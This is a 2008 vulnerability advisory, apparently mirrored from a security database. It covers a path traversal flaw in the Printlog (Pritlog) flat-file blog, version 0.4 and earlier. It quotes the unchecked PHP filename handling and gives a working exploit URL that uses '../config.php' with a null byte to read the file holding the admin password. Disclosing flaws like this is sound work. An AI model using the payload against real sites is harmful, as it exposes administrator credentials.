Printlog <= 0.4: Remote File Edition Vulnerability

Type securityvulns
Reporter Securityvulns
Modified 2008-10-02T00:00:00


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Printlog <= 0.4: Remote File Edition Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

$ Program: Printlog $ File affected: index.php $ Version: 0.4 $ Download:

Found by Pepelux <pepelux[at]> eNYe-Sec -

-- Description (by the author's page) -- PRITLOG is an extremely simple, small and powerful blog system. It does not use or need a MYSQL database and fully works based on flat files. The idea is derived from a similar app called PPLOG.

-- Bug -- You can navigate and see the entries. Something like as: http://localhost/p/index.php?option=viewEntry&filename=00001

Code doesn't check the comments directory:

  1. function viewEntry() {
  2. $fileName = isset($_POST['filename'])?$_POST['filename']:$_GET['filename'];
  3. global $postdir, $separator, $newPostFile, $newFullPostNumber, $debugMode, $config_textAreaCols, $config_textAreaRows;
  4. global $config_allowComments, $config_commentsSecurityCode, $config_CAPTCHALength, $config_randomString;
  5. global $commentdir,$config_dbFilesExtension, $config_onlyNumbersOnCAPTCHA;
  6. $viewFileName=$postdir.$fileName.$config_dbFilesExtension;

-- Exploit -- If magic quotes are off you can do: http://localhost/p/index.php?option=viewEntry&filename=../config.php%00

config.php has the admin password